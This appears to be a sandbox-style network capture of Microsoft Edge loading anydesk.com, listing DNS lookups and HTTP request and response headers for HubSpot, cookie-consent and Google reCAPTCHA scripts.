GET

https://js.hs-banner.com/7940397.js

msedge.exe

Remote address:

104.18.40.240:443

Request

GET /7940397.js HTTP/2.0
host: js.hs-banner.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:50 GMT
content-type: text/javascript; charset=UTF-8
x-amz-id-2: OwaTN/dFa6SDWs4AYj/gaD8YgefbbKfjxNnL2KaUqMcMn7i7PdeNMvSmRo73jlUurL5h2yduA0orsHceHQ4FE7dfbnK2XQ6E
x-amz-request-id: 7CSJXQZKBZE0CM8N
last-modified: Sat, 05 Oct 2024 06:50:37 GMT
etag: W/"c82d0d174b0aa68324771c11b62930b8"
x-amz-server-side-encryption: AES256
cache-control: max-age=300,public
x-amz-version-id: JeY27iMhRzZ1FCZRLjFsNnJNsgutMph_
access-control-allow-origin: https://anydesk.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin, Accept-Encoding
expires: Sat, 05 Oct 2024 16:10:51 GMT
content-encoding: gzip
x-envoy-upstream-service-time: 27
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: f07e19a5-dcc1-4980-851b-4312a8d213e7
x-evy-trace-served-by-pod: iad02/analytics-js-proxy-td/envoy-proxy-75d7846cb8-d7qvh
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: f07e19a5-dcc1-4980-851b-4312a8d213e7
cf-cache-status: HIT
age: 119
server: cloudflare
cf-ray: 8cdeaabc8960b761-AMS
DNS

cdn.cookielaw.org

msedge.exe

Remote address:

8.8.8.8:53

Request

cdn.cookielaw.org

IN A

Response

cdn.cookielaw.org

IN A

104.18.87.42

cdn.cookielaw.org

IN A

104.18.86.42
DNS

cdn.cookielaw.org

msedge.exe

Remote address:

8.8.8.8:53

Request

cdn.cookielaw.org

IN A

Response

cdn.cookielaw.org

IN A

104.18.87.42

cdn.cookielaw.org

IN A

104.18.86.42
GET

https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

msedge.exe

Remote address:

104.18.87.42:443

Request

GET /scripttemplates/otSDKStub.js HTTP/2.0
host: cdn.cookielaw.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:07:49 GMT
content-type: application/javascript
x-frame-options: SAMEORIGIN
referrer-policy: same-origin
cache-control: max-age=15
expires: Sat, 05 Oct 2024 16:08:04 GMT
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
server: cloudflare
cf-ray: 8cdeaab69f71b94e-AMS
content-encoding: gzip
GET

https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

msedge.exe

Remote address:

104.18.87.42:443

Request

GET /scripttemplates/otSDKStub.js HTTP/2.0
host: cdn.cookielaw.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:08:09 GMT
content-type: application/javascript
x-frame-options: SAMEORIGIN
referrer-policy: same-origin
cache-control: max-age=15
expires: Sat, 05 Oct 2024 16:08:24 GMT
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
server: cloudflare
cf-ray: 8cdeab319a1fb94e-AMS
content-encoding: gzip
GET

https://cdn.cookielaw.org/scripttemplates/otSDKStub.js

msedge.exe

Remote address:

104.18.87.42:443

Request

GET /scripttemplates/otSDKStub.js HTTP/2.0
host: cdn.cookielaw.org
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 403

date: Sat, 05 Oct 2024 16:08:30 GMT
content-type: application/javascript
x-frame-options: SAMEORIGIN
referrer-policy: same-origin
cache-control: max-age=15
expires: Sat, 05 Oct 2024 16:08:45 GMT
vary: Accept-Encoding
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
server: cloudflare
cf-ray: 8cdeabb70ccdb94e-AMS
content-encoding: gzip
DNS

cta-service-cms2.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cta-service-cms2.hubspot.com

IN A

Response

cta-service-cms2.hubspot.com

IN A

104.16.117.116

cta-service-cms2.hubspot.com

IN A

104.16.118.116
DNS

cta-service-cms2.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

cta-service-cms2.hubspot.com

IN A

Response

cta-service-cms2.hubspot.com

IN A

104.16.118.116

cta-service-cms2.hubspot.com

IN A

104.16.117.116
DNS

116.117.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.117.16.104.in-addr.arpa

IN PTR

Response
DNS

142.78.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

142.78.16.104.in-addr.arpa

IN PTR

Response
DNS

168.160.16.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

168.160.16.104.in-addr.arpa

IN PTR

Response
DNS

42.87.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

42.87.18.104.in-addr.arpa

IN PTR

Response
DNS

240.40.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.40.18.104.in-addr.arpa

IN PTR

Response
DNS

240.40.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.40.18.104.in-addr.arpa

IN PTR

Response
DNS

www.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

216.58.201.100
DNS

www.google.com

msedge.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

216.58.201.100
GET

https://www.google.com/js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js

msedge.exe

Remote address:

216.58.201.100:443

Request

GET /js/bg/zEg4NaMiOUeKKZ2pqXY4HMvMf5VCq4avNU_6WgNs2Cw.js HTTP/2.0
host: www.google.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://www.recaptcha.net/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
DNS

100.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

100.201.58.216.in-addr.arpa

IN PTR

Response

100.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f1001e100net

100.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f4�J

100.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f4�J
DNS

227.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.179.250.142.in-addr.arpa

IN PTR

Response

227.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f31e100net
DNS

perf-na1.hsforms.com

msedge.exe

Remote address:

8.8.8.8:53

Request

perf-na1.hsforms.com

IN A

Response

perf-na1.hsforms.com

IN A

104.18.80.204

perf-na1.hsforms.com

IN A

104.19.175.188
DNS

perf-na1.hsforms.com

msedge.exe

Remote address:

8.8.8.8:53

Request

perf-na1.hsforms.com

IN A

Response

perf-na1.hsforms.com

IN A

104.19.175.188

perf-na1.hsforms.com

IN A

104.18.80.204
DNS

app.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

app.hubspot.com

IN A

Response

app.hubspot.com

IN A

104.16.117.116

app.hubspot.com

IN A

104.16.118.116
DNS

app.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

app.hubspot.com

IN A

Response

app.hubspot.com

IN A

104.16.118.116

app.hubspot.com

IN A

104.16.117.116
GET

https://perf-na1.hsforms.com/embed/v3/counters.gif?key=config-loaded-failure&value=1

msedge.exe

Remote address:

104.18.80.204:443

Request

GET /embed/v3/counters.gif?key=config-loaded-failure&value=1 HTTP/1.1
Host: perf-na1.hsforms.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://anydesk.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 403 Forbidden

Date: Sat, 05 Oct 2024 16:07:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Sat, 05 Oct 2024 16:08:06 GMT
Set-Cookie: __cf_bm=qxDA273XjP9hQVVfnye4AR93CjGzNsiFDXgAeUMQ7lw-1728144471-1.0.1.1-WuSBd2JnhfFpN_GqWbfkCVV7r7Wy7CwrvIREJcm1Y_bYAHfysanIK6YsQ4iYpnrEUQOcIJff0jAhsOLN9dSwGQ; path=/; expires=Sat, 05-Oct-24 16:37:51 GMT; domain=.hsforms.com; HttpOnly; Secure; SameSite=None
Vary: Accept-Encoding
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 8cdeaac06b4d9fe8-AMS
Content-Encoding: br
GET

https://js.hs-banner.com/cookie-banner-public/v1/cf-location

msedge.exe

Remote address:

104.18.40.240:443

Request

GET /cookie-banner-public/v1/cf-location HTTP/2.0
host: js.hs-banner.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:51 GMT
content-type: text/plain;charset=UTF-8
content-length: 2
access-control-allow-origin: *
cache-control: private, max-age=1500
vary: Accept-Encoding
server: cloudflare
cf-ray: 8cdeaac19826b7a2-AMS
DNS

static.hsappstatic.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.hsappstatic.net

IN A

Response

static.hsappstatic.net

IN A

104.17.173.91

static.hsappstatic.net

IN A

104.17.175.91

static.hsappstatic.net

IN A

104.17.172.91

static.hsappstatic.net

IN A

104.17.174.91

static.hsappstatic.net

IN A

104.17.176.91
DNS

static.hsappstatic.net

msedge.exe

Remote address:

8.8.8.8:53

Request

static.hsappstatic.net

IN A

Response

static.hsappstatic.net

IN A

104.17.174.91

static.hsappstatic.net

IN A

104.17.176.91

static.hsappstatic.net

IN A

104.17.175.91

static.hsappstatic.net

IN A

104.17.173.91

static.hsappstatic.net

IN A

104.17.172.91
GET

https://static.hsappstatic.net/conversations-visitor-ui/static-1.20154/sass/visitor.css

msedge.exe

Remote address:

104.17.173.91:443

Request

GET /conversations-visitor-ui/static-1.20154/sass/visitor.css HTTP/2.0
host: static.hsappstatic.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/css,*/*;q=0.1
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: style
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:52 GMT
content-type: text/css
x-amz-replication-status: COMPLETED
last-modified: Thu, 22 Aug 2024 14:13:31 GMT
etag: W/"dc5e387877a977f3de08b50cd01254bf"
x-amz-server-side-encryption: AES256
x-amz-version-id: M7EFEtjBeklcG9bBcFndzaxXBCGbTFpQ
content-encoding: gzip
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Hit from cloudfront
via: 1.1 ca0e18fe48e6994b3446a58a1e05c1ce.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P5
x-amz-cf-id: Jskot3zS17kNymxsoEFbFNBvL2XDil_HTAf2XGVwWgT_G1PAEb8XjQ==
cf-cache-status: HIT
age: 1385436
expires: Sun, 05 Oct 2025 16:07:52 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5%2BEAxAy06SqHNRk8niull%2BHJD7UMPIcJ299zOflfsq5uZ4ABQ6MYWvoiHQPyKuTprvkoFWt5rjzXQhqGJMl9uOYL50Vod40y3Gnhe9Wq2pCHtyyyzLlWLR0dIltMMjyC8miNlmTyvpQ%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server-timing: cfr;desc=8cdeaac7cbdeb772-AMS
timing-allow-origin: *
server: cloudflare
cf-ray: 8cdeaac7cbdeb772-AMS
GET

https://static.hsappstatic.net/conversations-visitor-ui/static-1.9449/audio/notification.mp3

msedge.exe

Remote address:

104.17.173.91:443

Request

GET /conversations-visitor-ui/static-1.9449/audio/notification.mp3 HTTP/2.0
host: static.hsappstatic.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
accept-encoding: identity;q=1, *;q=0
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: audio
referer: https://app.hubspot.com/
accept-language: en-US,en;q=0.9
range: bytes=0-

Response

HTTP/2.0 206

date: Sat, 05 Oct 2024 16:07:52 GMT
content-type: audio/mpeg
content-length: 4745
x-amz-replication-status: COMPLETED
last-modified: Thu, 16 Jul 2020 13:19:49 GMT
etag: "3461d03c5348e31076d4bfbfdd5203dd"
x-amz-server-side-encryption: AES256
x-amz-version-id: on8frpe.Z3jlpN7H5iZlTZN7RfYUNILF
x-cache: Hit from cloudfront
via: 1.1 039ee779486557ccf22d128d6266e00e.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P5
x-amz-cf-id: RysUsUSWNVwbt8QeYdRIOmiwmR-xmbMh7TATGiygSnm-LYzx085Mtg==
age: 852161
cf-cache-status: HIT
expires: Sun, 05 Oct 2025 16:07:52 GMT
cache-control: public, max-age=31536000
content-range: bytes 0-4744/4745
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h6TTkv2kE21HXh71CsHAsgl778Lua2ENYNymLxjbCY%2BbhMXf823CW3S%2Fy%2BEuEH1XjicyuVjwuzcbQr56%2But%2F7Haj8ttFjHNmTzX%2FnkkWtO%2F9X4Tk6%2B8D8lETdwFox%2BR2swZZdzXCT%2F8%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server-timing: cfr;desc=8cdeaacb5f37b772-AMS
timing-allow-origin: *
server: cloudflare
cf-ray: 8cdeaacb5f37b772-AMS
GET

https://static.hsappstatic.net/head-dlb/static-1.1137/bundle.production.js

msedge.exe

Remote address:

104.17.173.91:443

Request

GET /head-dlb/static-1.1137/bundle.production.js HTTP/2.0
host: static.hsappstatic.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://app.hubspot.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:52 GMT
content-type: application/javascript
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET
access-control-max-age: 3000
access-control-allow-credentials: true
x-amz-replication-status: COMPLETED
last-modified: Thu, 26 Sep 2024 16:46:13 GMT
etag: W/"d1db33f1aea6381a0ce46a2519e743e2"
x-amz-server-side-encryption: AES256
x-amz-version-id: _BHlOfquK6izb30XhJrjuBOXChIHwads
content-encoding: gzip
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Miss from cloudfront
via: 1.1 7d758b616f5473c7b4bee1c49ecfa98a.cloudfront.net (CloudFront)
x-amz-cf-pop: AMS58-P5
x-amz-cf-id: LM3LThjkRJ688RObEJ4dc-Dc3VWrZUCBCUOkdGGtCryjYkKMgOlo_A==
cf-cache-status: HIT
age: 761400
expires: Sun, 05 Oct 2025 16:07:52 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xB1hfl8Yqu9xJrzMvAafbp69ZXOMibKR2BNrNZ0DQFqa%2BOmG4twE0kC5j%2F7IOZh1mTlwtLFmiYGaxvjLrKSBjiIO9zE%2B4WiFTCZPXf%2BcKM71V47NOUEjuR4LvI8a2M0EViJcMZ1tl1E%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server-timing: cfr;desc=8cdeaac72b600bd1-AMS
timing-allow-origin: *
server: cloudflare
cf-ray: 8cdeaac72b600bd1-AMS
GET

https://static.hsappstatic.net/conversations-visitor-ui/static-1.20626/bundles/visitor.js

msedge.exe

Remote address:

104.17.173.91:443

Request

GET /conversations-visitor-ui/static-1.20626/bundles/visitor.js HTTP/2.0
host: static.hsappstatic.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://app.hubspot.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:52 GMT
content-type: application/javascript
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET
access-control-max-age: 3000
access-control-allow-credentials: true
x-amz-replication-status: COMPLETED
last-modified: Mon, 30 Sep 2024 23:21:33 GMT
etag: W/"f2f897eb2f8d8529b1cee918ff9d57eb"
x-amz-server-side-encryption: AES256
x-amz-version-id: NM2NsioqsVExlRq.s0OeOZklGHVa6Ke6
content-encoding: gzip
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Miss from cloudfront
via: 1.1 ff571229df9f46b01b0e434bcb36f9e6.cloudfront.net (CloudFront)
x-amz-cf-pop: ZRH55-P1
x-amz-cf-id: ToGD9Pb5Y8i9e-dxXTQY0A95-Nxe_MYvsPTQfQh_jncZHyWipSgvrQ==
cf-cache-status: HIT
age: 332038
expires: Sun, 05 Oct 2025 16:07:52 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnjczzxizRgswo9WmkEOLIGeD9njc4e05JPIiYT9Pc3NcU89tYMLiv9%2Bo3hRCgmXa%2BIR%2BtW8Gl9eOM3VfP7wkNzPi2YjGQ5FrXzzUPnZo2O5YmwXjg01xvnMF7MgU9%2F8vGuqxWkp2fw%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server-timing: cfr;desc=8cdeaac72b650bd1-AMS
timing-allow-origin: *
server: cloudflare
cf-ray: 8cdeaac72b650bd1-AMS
GET

https://static.hsappstatic.net/hubspot-dlb/static-1.865/bundle.production.js

msedge.exe

Remote address:

104.17.173.91:443

Request

GET /hubspot-dlb/static-1.865/bundle.production.js HTTP/2.0
host: static.hsappstatic.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://app.hubspot.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:52 GMT
content-type: application/javascript
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET
access-control-max-age: 3000
access-control-allow-credentials: true
x-amz-replication-status: COMPLETED
last-modified: Fri, 30 Aug 2024 18:27:36 GMT
etag: W/"c6afe4b189f4524cb752163af25f546b"
x-amz-server-side-encryption: AES256
x-amz-version-id: zUHAk0JkkIimHr4Jtk3WBEEBu5du4w.n
content-encoding: gzip
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Miss from cloudfront
via: 1.1 158d422f23d8099113265e29ef6041c0.cloudfront.net (CloudFront)
x-amz-cf-pop: MAD53-P4
x-amz-cf-id: rrxi1Wz5M4PNnorTv45H7AB03wgh9KkDGeVEniBlmxAaPEawIHMaYQ==
cf-cache-status: HIT
age: 2079358
expires: Sun, 05 Oct 2025 16:07:52 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FsMgeJQvNx8dBS7rTC35Kj%2BsfQCZQyH356MLdb%2FlDQG0Rv5HDooMUmTN1BCep306KTPOVGSaEfb6oc4Su2KkAbyECkiyBqzXpFHWoPxwAxs5d%2FLnCWyTKJrdk%2FJ1xeM%2FNB3Ypgr%2FLTg%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server-timing: cfr;desc=8cdeaac72b680bd1-AMS
timing-allow-origin: *
server: cloudflare
cf-ray: 8cdeaac72b680bd1-AMS
GET

https://static.hsappstatic.net/conversations-visitor-ui/static-1.20571/i18n-data-data-locales-en-us.js

msedge.exe

Remote address:

104.17.173.91:443

Request

GET /conversations-visitor-ui/static-1.20571/i18n-data-data-locales-en-us.js HTTP/2.0
host: static.hsappstatic.net
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://app.hubspot.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:07:52 GMT
content-type: application/javascript
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET
access-control-max-age: 3000
access-control-allow-credentials: true
x-amz-replication-status: COMPLETED
last-modified: Wed, 25 Sep 2024 21:31:03 GMT
etag: W/"30c616d158753e02623fc6a077b6aa2a"
x-amz-server-side-encryption: AES256
x-amz-version-id: ynKtcSXWFsc9jBuv75Ti.Eo9vYpfi_5v
vary: Origin,Accept-Encoding,Access-Control-Request-Headers,Access-Control-Request-Method
x-cache: Miss from cloudfront
via: 1.1 01d9de39ec907ee6febcea913f8cbfa2.cloudfront.net (CloudFront)
x-amz-cf-pop: LHR50-P6
x-amz-cf-id: yiZJXs-gozcpbyLOmnQzBuZtX4k1fpPkgqt5SHW_owg46s84aPW2dQ==
cf-cache-status: HIT
age: 127654
expires: Sun, 05 Oct 2025 16:07:52 GMT
cache-control: public, max-age=31536000
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4aFb67DxAYWCcBji77Xd%2FEbFZhq1U7EQMARhLB0WPdTjNw%2FK2ILJLqcS2d6BJ3om9AkFuUR2lQqVJou6o5coX%2BI7wlTiPX1eJl1lFrkx6XxGUzKp0bgBQGnxZdT8K%2BDydgKEHQ0s2LQ%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
server-timing: cfr;desc=8cdeaacb3a410bd1-AMS
timing-allow-origin: *
server: cloudflare
cf-ray: 8cdeaacb3a410bd1-AMS
content-encoding: br
DNS

204.80.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

204.80.18.104.in-addr.arpa

IN PTR

Response
DNS

204.80.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

204.80.18.104.in-addr.arpa

IN PTR

Response
DNS

91.173.17.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.173.17.104.in-addr.arpa

IN PTR

Response
DNS

91.173.17.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

91.173.17.104.in-addr.arpa

IN PTR

Response
DNS

exceptions.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

exceptions.hubspot.com

IN A

Response

exceptions.hubspot.com

IN A

104.16.117.116

exceptions.hubspot.com

IN A

104.16.118.116
DNS

exceptions.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

exceptions.hubspot.com

IN A

Response

exceptions.hubspot.com

IN A

104.16.118.116

exceptions.hubspot.com

IN A

104.16.117.116
DNS

metrics-fe-na1.hubspot.com

msedge.exe

Remote address:

8.8.8.8:53

Request

metrics-fe-na1.hubspot.com

IN A

Response

metrics-fe-na1.hubspot.com
